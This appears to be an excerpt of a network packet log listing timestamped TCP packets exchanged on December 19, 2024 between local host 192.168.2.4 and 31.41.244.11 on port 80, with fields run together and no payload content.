                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.900017977 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.900837898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.900891066 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.900895119 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.900949955 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.901751995 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.901849031 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.901854038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.901904106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.902730942 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.902787924 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.902854919 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.902909994 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.903743982 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.903800011 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.903855085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.903908014 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.904679060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.904736996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.904805899 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.904861927 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.905659914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.905729055 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.905782938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.905844927 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.906687021 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.906738997 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.906821966 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.906877995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.907618046 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.907672882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.907726049 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.907789946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.908571005 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.908627033 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.908689976 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.908745050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.909575939 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.909646988 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.909699917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.909750938 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.910552025 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.910609007 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.910641909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.910696030 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.911576033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.911638021 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.911685944 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.911737919 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.912486076 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.912544966 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.912612915 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.912671089 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.913461924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.913520098 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.913587093 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.913640976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.914436102 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.914489985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.914542913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.914593935 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.915380955 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.915435076 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.915493011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.915541887 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.916403055 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.916460037 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.916466951 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.916520119 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.917391062 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.917444944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.917494059 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.917552948 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.918317080 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.918374062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.918438911 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.918493032 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.919302940 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.919362068 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.919409990 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.919466019 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.920265913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.920321941 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.920391083 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.920461893 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.921230078 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.921287060 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.062330008 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.062473059 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.062524080 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.062577963 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.062798977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.062855005 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.062947035 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.063005924 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.063766956 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.063817978 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.063873053 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.063929081 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.064745903 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.064805031 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.064858913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.064920902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.065691948 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.065752983 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.065813065 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.065871000 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.066672087 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.066745996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.066797972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.066855907 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.067648888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.067708015 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.067734003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.067787886 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.068619013 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.068675041 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.068742990 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.068797112 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.069622040 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.069725990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.069740057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.069792032 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.070579052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.070636034 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.070703983 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.070759058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.071548939 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.071620941 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.071671009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.071724892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.072494030 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.072551012 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.072619915 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.072679043 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.073533058 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.073585987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.073637962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.073689938 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.074570894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.074635983 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.074652910 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.074702024 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.075440884 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.075499058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.075567007 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.075622082 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.076417923 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.076472998 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.076514959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.076570988 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.077398062 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.077452898 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.077522993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.077579975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.078360081 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.078414917 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.078483105 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.078536987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.079345942 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.079397917 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.079467058 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.079519987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.080302000 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.080403090 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.080415964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.080468893 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.081351042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.081403017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.081485033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.081538916 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.082274914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.082333088 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.082403898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.082457066 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.083281994 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.083355904 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.083414078 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.083466053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.084194899 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.084244967 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.084336042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.084391117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.085181952 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.085241079 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.085302114 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.085351944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.086133957 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.086193085 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.086262941 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.086317062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.087126970 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.087183952 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.087243080 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.087296963 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.088114977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.088171005 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.088236094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.088290930 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.089066029 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.089122057 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.089191914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.089246035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.090049982 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.090107918 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.090162992 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.090218067 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.091017962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.091092110 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.091185093 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.091242075 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.092003107 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.092058897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.092089891 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.092160940 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.092957973 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.093014002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.093100071 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.093154907 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.093939066 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.093992949 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.094059944 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.094115019 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.094914913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.094974995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.095029116 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.095081091 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.096013069 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.096074104 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.096137047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.096195936 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.096868992 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.096925974 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.096997023 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.097054958 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.097834110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.097892046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.097960949 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.098012924 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.098831892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.098890066 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.098957062 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.099011898 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.099826097 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.099884033 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.099905014 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.099957943 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.100816011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.100872040 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.100938082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.101036072 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.101730108 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.101788044 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.101874113 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.101931095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.102714062 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.102773905 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.102822065 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.102879047 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.103683949 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.103743076 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.103792906 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.103848934 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.104655981 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.104712963 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.104768038 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.104824066 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.105617046 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.105673075 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.105730057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.105784893 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.106632948 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.106688023 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.106756926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.106812000 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.107615948 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.107671022 CET4976380192.168.2.431.41.244.11
